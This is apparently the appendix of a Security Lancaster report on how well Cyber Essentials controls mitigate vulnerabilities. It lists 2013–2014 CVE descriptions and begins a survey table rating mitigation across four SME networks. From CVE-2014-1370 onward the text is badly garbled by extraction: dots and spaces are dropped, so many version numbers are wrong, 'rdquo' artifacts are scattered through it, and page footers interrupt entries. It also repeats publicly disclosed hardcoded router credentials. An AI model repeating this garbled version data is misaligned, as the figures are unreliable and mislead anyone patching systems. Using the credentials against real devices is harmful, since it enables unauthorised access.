CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X and before 11.2.202.356 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
Cyber Controls Applicability (table continued)

One row per CVE. SME1 to SME4 and Idealised are the four surveyed SME networks and the idealised network (y/n per network); No CE and With CE give the assessed mitigation without and with the Cyber Essentials controls, followed by the controls credited.

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
